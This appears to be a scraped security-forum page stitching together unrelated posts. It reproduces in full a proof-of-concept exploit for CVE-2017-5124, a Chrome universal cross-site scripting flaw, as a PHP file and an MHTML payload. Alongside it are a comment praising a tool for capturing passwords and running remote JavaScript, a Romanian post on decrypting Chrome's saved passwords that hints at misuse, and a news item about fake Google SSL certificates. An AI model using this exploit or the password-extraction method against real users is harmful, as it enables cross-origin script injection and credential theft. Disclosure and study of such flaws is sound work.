Search the Community

Article: https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy Press: https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html Source: VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

Google Chrome versions prior to 62 universal cross site scripting proof of concept exploit. Download CVE-2017-5124-master.zip Content: PoC.mht PoC.php README.md Mirror: README.md # CVE-2017-5124 ### UXSS with MHTML DEMO: https://bo0om.ru/chrome_poc/PoC.php (tested on Chrome/61.0.3163.100) PoC.php <?php $filename=realpath("PoC.mht"); header( "Content-type: multipart/related"); readfile($filename); ?> PoC.mht MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com <script>alert('Location origin: '+location.origin)</script> ------MultipartBoundary---- Source

Ohh really cool tool, much better than BEef, with this tool you can easy capture, passwords, execute remotly javascript code, capture screen, clone some sessions in your browser.

Am conceput un progr?mel pentru decriptarea/afi?area/salvarea parolelor salvate în browser-ul Google Chrome. Atunci când alegem s? salv?m parolele diferitelor conturi de pe diferitele site-uri pe care navig?m, Chrome salveaz? respectivele informa?ii într-o baz? de date SQLite numit? „Login Data”, localizat? în mod normal în C:\Users\USERNAME\AppData\Local\Google\Chrome\User Data\Default\ (bineîn?eles, înlocuind USERNAME cu numele de utilizator Windows). Câmpul de parol? este un câmp BLOB, adic? nu poate fi vizualizat în mod direct. Pentru criptarea sa, Chrome folose?te ca „seed” numele de utilizator al contului Windows, prin urmare, nu ve?i reu?i s? decripta?i o baz? de date Chrome decât logându-v? cu numele de utilizator Windows care a fost folosit pentru crearea bazei de date. Programul poate fi folosit pentru studierea ?i aprofundarea modului în care Google Chrome implementeaz? securitatea datelor, poate fi folosit pentru recuperarea numelor de utilizator ori a parolelor uitate, sau... pentru alte scopuri, în func?ie de imagina?ia fiec?ruia Pentru u?urarea... altor scopuri, am ad?ugat ?i o func?ie de exportare rapid? a datelor într-un fi?ier XML ce va fi salvat pe desktop (ChromePwd.xml). Executabilul compilat poate fi desc?rcat aici. Codul surs? (proiect Visual Studio 2013) poate fi desc?rcat aici. Enjoy

Google announced that it detected a French government agency using unauthorized digital certificates for several Google domains to perform man-in-the-middle attacks on a private network. Google security engineer Adam Langley described the incident as a "Serious Security breach", discovered in early December. These bogus certificates were fraudulently signed by the certificate authority of DG Trésor, the French Treasury and Cyber Defense agency known as ANSSI. Google has immediately updated Chrome’s certificate revocation list to block all dodgy certificates issued by the French authority. ANSSI said that the intermediate CA certificate was used to inspect encrypted traffic with the user's knowledge on a private network with a commercial device i.e. Snooping on its own users’ Internet usage. Last year, a Turkish certificate authority called 'Turktrust' was revealed to have issued two subordinate certificates for the domain gmail.com, and that these certificates had been used to intercept Gmail users’ traffic. NSA is also alleged to have used man-in-the-middle attacks through unauthorized certificates against Google in the past. Google said, "We're now working to bring this extra protection to more users who are not signed in." Source: Fake Google SSL Certificates, Made in France

Google Chrome password protected Rohos